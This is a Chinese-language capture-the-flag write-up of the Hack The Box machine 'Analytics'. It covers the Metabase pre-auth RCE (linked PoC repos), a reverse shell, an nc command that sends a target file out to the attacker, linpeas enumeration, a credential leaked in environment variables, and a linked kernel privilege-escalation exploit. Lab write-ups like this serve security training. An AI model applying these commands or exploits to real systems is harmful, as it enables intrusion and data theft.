Analytics是HTB上一个简单难度的机器,拿初始权限、用户权限很简单,root过程中学到了新的思路。

靶场信息

完成Analytics需要的一些技术:

  • 漏洞利用
  • 常见提权技巧

信息收集

端口扫描

Nmap进行端口扫描:

kali@kali ~/D/H/M/Analytics> nmap -p- -n --min-rate 3000 -T4 10.10.11.233
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-12 04:52 EST
Warning: 10.10.11.233 giving up on port because retransmission cap hit (6).
Nmap scan report for 10.10.11.233
Host is up (0.26s latency).
Not shown: 65530 closed tcp ports (conn-refused)
PORT      STATE    SERVICE
22/tcp    open     ssh
80/tcp    open     http
2976/tcp  filtered cns-srv-port
7827/tcp  filtered unknown
17394/tcp filtered unknown

Nmap done: 1 IP address (1 host up) scanned in 31.76 seconds

访问80端口,会跳转到域名,设置/etc/hosts之后可正常打开页面。

点击登录按钮后,会跳转到data.analytical.htb子域名。

初始权限

根据页面信息判断是Metabase系统,简单搜索即可发现存在RCE漏洞。

使用https://github.com/m3m0o/metabase-pre-auth-rce-poc.git可以成功RCE。

https://github.com/shamo0/CVE-2023-38646-PoC.git则不起作用。

接收反弹Shell时,pwncat-cs不能正常接收,而nc可以,有点奇怪。

用户权限

拿到初始权限之后,同样跑linpeas脚本收集系统信息。

在不能使用pwncat-cs实现的文件上传下载时:

  • 文件上传可以在本地运行python -m http.server 8088搭建简易HTTP服务,在反弹shell里wget下载
  • 文件下载可以在本地运行nc -lvnp local_port > receive接收文件,在反弹shell上运行nc local_ip local_port < /etc/hosts发送文件

在环境变量中包含用户登录信息,可以直接SSH登录。

f2e40e03b7e0:~$ env
env
SHELL=/bin/sh
MB_DB_PASS=
HOSTNAME=f2e40e03b7e0
LANGUAGE=en_US:en
MB_JETTY_HOST=0.0.0.0
JAVA_HOME=/opt/java/openjdk
MB_DB_FILE=//metabase.db/metabase.db
PWD=/home/metabase
LOGNAME=metabase
MB_EMAIL_SMTP_USERNAME=
HOME=/home/metabase
LANG=en_US.UTF-8
META_USER=metalytics
META_PASS=An4lytics_ds20223#

root权限

root部分同样使用linpeas收集信息:

╔══════════╣ Container related tools present (if any):
/usr/bin/docker
/usr/bin/runc

╔══════════╣ Active Ports
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-ports
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:3000          0.0.0.0:*               LISTEN      -                   
tcp6       0      0 :::22                   :::*                    LISTEN      -                   
tcp6       0      0 :::80                   :::*                    LISTEN      -   

lrwxrwxrwx 1 root root 37 Aug  3 18:40 /etc/nginx/sites-enabled/analytical -> /etc/nginx/sites-available/analytical
server {
    listen 80;
    listen [::]:80;
    root /var/www/site;
    index index.html;
    server_name analytical.htb;
    if ($host != analytical.htb) {
        rewrite ^ http://analytical.htb/;
    }
    location / {
        try_files $uri $uri/ =404;
    }
}
lrwxrwxrwx 1 root root 46 Aug  3 19:17 /etc/nginx/sites-enabled/data.analytical.htb -> /etc/nginx/sites-available/data.analytical.htb
server {
    listen 80;
    server_name data.analytical.htb;
    location / {
        proxy_pass          http://localhost:3000; 
        proxy_http_version  1.1;
        proxy_set_header Host $host;
        proxy_set_header X-Real-IP $remote_addr;
    }
}


╔══════════╣ Checking if containerd(ctr) is available
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation/containerd-ctr-privilege-escalation
ctr was found in /usr/bin/ctr, you may be able to escalate privileges with it
ctr: failed to dial "/run/containerd/containerd.sock": connection error: desc = "transport: error while dialing: dial unix /run/containerd/containerd.sock: connect: permission denied"

╔══════════╣ Checking if runc is available
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation/runc-privilege-escalation
runc was found in /usr/bin/runc, you may be able to escalate privileges with it

╔══════════╣ Analyzing Interesting logs Files (limit 70)
-rw-r----- 1 www-data adm 17619 Dec 12 12:04 /var/log/nginx/access.log

-rw-r--r-- 1 root root 0 Aug  8 11:48 /var/log/nginx/error.log


╔══════════╣ Capabilities
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#capabilities
══╣ Current shell capabilities
CapInh:  0x0000000000000000=
CapPrm:  0x0000000000000000=
CapEff:	 0x0000000000000000=
CapBnd:  0x000001ffffffffff=cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_linux_immutable,cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw,cap_ipc_lock,cap_ipc_owner,cap_sys_module,cap_sys_rawio,cap_sys_chroot,cap_sys_ptrace,cap_sys_pacct,cap_sys_admin,cap_sys_boot,cap_sys_nice,cap_sys_resource,cap_sys_time,cap_sys_tty_config,cap_mknod,cap_lease,cap_audit_write,cap_audit_control,cap_setfcap,cap_mac_override,cap_mac_admin,cap_syslog,cap_wake_alarm,cap_block_suspend,cap_audit_read,cap_perfmon,cap_bpf,cap_checkpoint_restore
CapAmb:  0x0000000000000000=

══╣ Parent process capabilities
CapInh:	 0x0000000000000000=
CapPrm:	 0x0000000000000000=
CapEff:	 0x0000000000000000=
CapBnd:	 0x000001ffffffffff=cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_linux_immutable,cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw,cap_ipc_lock,cap_ipc_owner,cap_sys_module,cap_sys_rawio,cap_sys_chroot,cap_sys_ptrace,cap_sys_pacct,cap_sys_admin,cap_sys_boot,cap_sys_nice,cap_sys_resource,cap_sys_time,cap_sys_tty_config,cap_mknod,cap_lease,cap_audit_write,cap_audit_control,cap_setfcap,cap_mac_override,cap_mac_admin,cap_syslog,cap_wake_alarm,cap_block_suspend,cap_audit_read,cap_perfmon,cap_bpf,cap_checkpoint_restore
CapAmb:	 0x0000000000000000=


Files with capabilities (limited to 50):
/usr/bin/mtr-packet cap_net_raw=ep
/usr/bin/ping cap_net_raw=ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper cap_net_bind_service,cap_net_admin=ep

╔══════════╣ Searching root files in home dirs (limit 30)
/home/
/home/metalytics/.bash_history
/home/metalytics/user.txt
/root/
/var/www

                            ╔═════════════════════════╗
════════════════════════════╣ Other Interesting Files ╠════════════════════════════
                            ╚═════════════════════════╝
╔══════════╣ .sh files in path
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#script-binaries-in-path
/usr/bin/rescan-scsi-bus.sh
/usr/bin/gettext.sh
/usr/bin/dockerd-rootless.sh
/usr/bin/dockerd-rootless-setuptool.sh

2023-08-08+11:53:02.9848993850 /usr/local/sbin/laurel

╔══════════╣ Unexpected in /opt (usually empty)
total 12
drwxr-xr-x  3 root root 4096 Aug  8 11:37 .
drwxr-xr-x 18 root root 4096 Aug  8 11:37 ..
drwx--x--x  4 root root 4096 Aug  8 11:37 containerd



╔══════════╣ Executing Linux Exploit Suggester
╚ https://github.com/mzet-/linux-exploit-suggester
[+] [CVE-2022-2586] nft_object UAF

   Details: https://www.openwall.com/lists/oss-security/2022/08/29/5
   Exposure: less probable
   Tags: ubuntu=(20.04){kernel:5.12.13}
   Download URL: https://www.openwall.com/lists/oss-security/2022/08/29/5/1
   Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)

-rwsr-xr-x 1 root root 331K Aug 24 13:40 /usr/lib/openssh/ssh-keysign

尝试使用runc的漏洞提权,失败;靶机上runc版本为1.1.10,不存在漏洞。

使用Pspy也没有发现任何信息。

最后看官方论坛上帖子的提示,搜索操作系统的漏洞,第一个就是。。。
hint

https://github.com/g1vi/CVE-2023-2640-CVE-2023-32629.git

总结

root部分思维得活跃些,连靶机的网络不稳定、一顿一顿的,有点烦。